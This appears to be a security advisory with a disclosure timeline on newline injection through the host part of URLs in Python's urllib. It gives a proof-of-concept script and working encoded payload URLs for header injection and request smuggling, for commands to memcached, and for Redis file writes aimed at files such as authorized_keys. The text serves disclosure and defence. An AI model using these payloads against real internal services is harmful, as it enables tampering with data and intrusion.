Python’s built-in URL library (“urllib2” in 2.x and “urllib” in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. “smuggling” attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.
The Bug
The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):
#!/usr/bin/env python3
import sys
import urllib
import urllib.error
import urllib.request

url = sys.argv[1]

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)
This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:
nc -l -p 12345
In a non-malicious example, we can hit that service by running:
./fetch3.py http://127.0.0.1:12345/foo
This caused the following request headers to appear in the netcat terminal:
GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Connection: close
Host: 127.0.0.1:12345
Now we repeat this exercise with a malicious hostname:
./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo
The observed HTTP request is:
GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
X-injected: header
x-leftover: :12345
Connection: close
Here the attacker can fully control a new injected HTTP header.
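To see why the decoded host turns into extra header lines, here is a minimal sketch. It is a simplified model of the behavior described above, not urllib's actual code path: we assume the host is percent-decoded and then pasted into the Host header as-is. The variable names are ours.

```python
from urllib.parse import unquote

# Host component exactly as it appears in the malicious URL above.
raw_host = "127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20"
port = 12345  # the port text ends up trailing the last injected header

# Simplified model (an assumption, not urllib's real implementation):
# decode the host, then place it into the Host header without validation.
decoded_host = unquote(raw_host)
host_header = "Host: {}:{}".format(decoded_host, port)

# Each CRLF in the decoded host starts a new header line on the wire.
header_lines = host_header.split("\r\n")
for line in header_lines:
    print(line)
```

The three printed lines correspond to the Host, X-injected and x-leftover headers in the observed request, which is why the trailing ":12345" shows up as the value of x-leftover.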
The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to look up the appropriate hostname:
http://localhost%0d%0ax-bar:%20:12345/foo
But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:
http://localhost%00%0d%0ax-bar:%20:12345/foo
Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.
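Because redirects bypass any check made on the original URL, a check would have to run on every hop. The following is a rough sketch of that idea, not a complete defense: host_is_clean, CheckedRedirectHandler and checked_urlopen are hypothetical names of our own, and the rule "no control characters or spaces in the decoded network location" is an assumption about what counts as suspicious.

```python
import urllib.error
import urllib.request
from urllib.parse import unquote, urlsplit


def host_is_clean(url):
    """Return True if the decoded netloc has no control characters or spaces."""
    netloc = unquote(urlsplit(url).netloc)
    return bool(netloc) and not any(
        ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in netloc
    )


class CheckedRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Hypothetical handler that re-validates every redirect target."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if not host_is_clean(newurl):
            raise urllib.error.URLError("refusing redirect to suspicious URL")
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def checked_urlopen(url, timeout=10):
    """Validate the initial URL, then fetch it with redirects re-checked."""
    if not host_is_clean(url):
        raise urllib.error.URLError("refusing suspicious URL")
    opener = urllib.request.build_opener(CheckedRedirectHandler)
    return opener.open(url, timeout=timeout)
```

Passing the handler subclass to build_opener replaces the default redirect handler, so the same check applies to the first URL and to each Location header a server returns.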
Attack Scenarios
Here we discuss just a few of the scenarios where exploitation of these flaws could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there is a wide variety of ways in which the flaws could be used, and we don’t pretend to be able to predict them all.
HTTP Header Injection and Request Smuggling
GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close
http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo
Which produces:
GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: Keep-Alive

POST /bar HTTP/1.1
Host: 127.0.0.1
Content-Length: 31

{"new":"json","content":"here"}
:12345
Connection: close
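For readers who want to see how such a URL is put together, here is a minimal sketch that percent-encodes the text to be injected after "Host: ". The port and path are taken from the example above and the variable names are ours. Note that quote() emits uppercase hex digits, so the result differs from the URL above in case only and decodes to the same bytes.

```python
from urllib.parse import quote, unquote

body = '{"new":"json","content":"here"}'

# Text that should appear right after "Host: " in the request stream:
# finish the first request's headers, then start a second request.
injected = (
    "127.0.0.1\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "POST /bar HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Length: {}\r\n"
    "\r\n"
    "{}\r\n"
).format(len(body), body)

# safe="" percent-encodes every reserved character, including "/" and ":".
encoded_host = quote(injected, safe="")
url = "http://{}:12345/foo".format(encoded_host)
print(url)
```

The Content-Length value has to match the smuggled body exactly (31 bytes here), otherwise the receiving server would treat the leftover ":12345" text as part of the body or wait for more data.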
Attacking memcached
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:
http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo
GET /foo HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
set foo 0 0 5
ABCDE
:11211
ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR
The “foo” value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.
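One way to read the response above is that a line-oriented service answers each line it does not understand with an error and carries on to the next one. The sketch below is a toy model of that behavior, written only to reproduce the responses shown in this advisory. It is not memcached's real parser: it assumes that only a five-token "set" line is understood, and that the request ends with the usual blank line.

```python
def toy_memcached(stream):
    """Toy model: understands only 'set'; every other line gets ERROR."""
    lines = stream.split(b"\r\n")
    if lines and lines[-1] == b"":
        lines.pop()  # whatever follows the final CRLF is not a line
    responses = []
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        if len(parts) == 5 and parts[0] == b"set":
            i += 1  # the following line is the data block for this key
            responses.append("STORED")
        else:
            responses.append("ERROR")
        i += 1
    return responses


# The request from above, assumed to end with the blank line that
# terminates the HTTP headers.
request = (
    b"GET /foo HTTP/1.1\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Connection: close\r\n"
    b"User-Agent: Python-urllib/3.4\r\n"
    b"Host: 127.0.0.1\r\n"
    b"set foo 0 0 5\r\n"
    b"ABCDE\r\n"
    b":11211\r\n"
    b"\r\n"
)

for response in toy_memcached(request):
    print(response)
```

The HTTP lines before and after the injected command are simply rejected one by one, so the surrounding request does not get in the attacker's way.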
Attacking Redis
In addition, it is possible to write files containing a limited amount of attacker-controlled data to arbitrary locations on the filesystem. For instance, this URL creates a new database file at /tmp/evil:
http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo
# strings -n 3 /tmp/evil
REDIS0006
foo
bar
~redis/.profile
~redis/.ssh/authorized_keys
...
In practice, however, many of these files may not be available, may not be used by the system, or may otherwise be impractical to attack.
Versions Affected
Responsible Disclosure Log
2016-01-15
Notified Python Security of vulnerability with full details.
2016-01-24
2016-01-26
2016-02-07
2016-02-08
2016-02-08
2016-02-12
2016-02-12
2016-03-15
2016-03-25
2016-06-14
2016-06-15
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held cyber security researcher positions at a variety of cyber security start-ups. She also has experience in different industry domains such as finance, healthcare and consumer products.